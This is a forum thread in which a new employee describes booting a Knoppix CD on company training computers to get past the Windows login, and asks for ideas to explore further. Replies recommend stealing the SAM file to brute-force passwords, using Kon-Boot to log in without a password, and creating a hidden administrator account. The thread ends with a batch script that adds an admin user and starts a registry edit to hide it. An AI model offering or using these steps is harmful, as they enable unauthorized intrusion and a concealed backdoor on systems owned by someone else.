righteous_slave

Exploring Work Computers w/Knoppix

6 posts in this topic

Ok, started a new job in the shipping department at a airplane manufacturer. It's a pretty easy-going place, so I get to do some wandering around. Stashed in a corner is a couple of tables of computers for training. After watching for a while and noticing that no one is doing any training on them, I go and check them out. Greeted with a Windows login screen (and a warning that this is the company's computer and network), I tried a couple of default admin logins to no avail. Let's see what rebooting brings up. The BIOS is password protected, but these HP's also have a boot menu that is not locked. Coming back later with a KNOPPIX cd, I pop it in, reboot, choose the cd drive and am greeted with a penguin!

OK, now what? I'm a major linux noob, and am looking for suggestions for exercises to try to help learn my way through both KNOPPIX and exploring new systems. I'm not looking for corporate espionage or sabotage, just some learning suggestions.

Wouldnt suggest playing with work computers but I would start by stealing the SAM file and trying to brute force some password.

I wouldn't recommend using Knoppix on a work computer. In fact, I wouldn't recommend tampering with the computer at all. However, if you got permission, this is what I would do.

First off, if someone see's a penguin on the screen, chances are they will question what it is. I wouldn't suggest using Knoppix. You'll just attract attention to yourself. Use a program called Konboot, it will allow you to pop the CD in and continue with loading Windows, however, it re-writes the SAM file temporarily on-the-fly so that you can use any password to login. Once you're logged in as administrator, make your own account, and hide it.

This is an example created by IllWill over @ illmob

@echo off
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg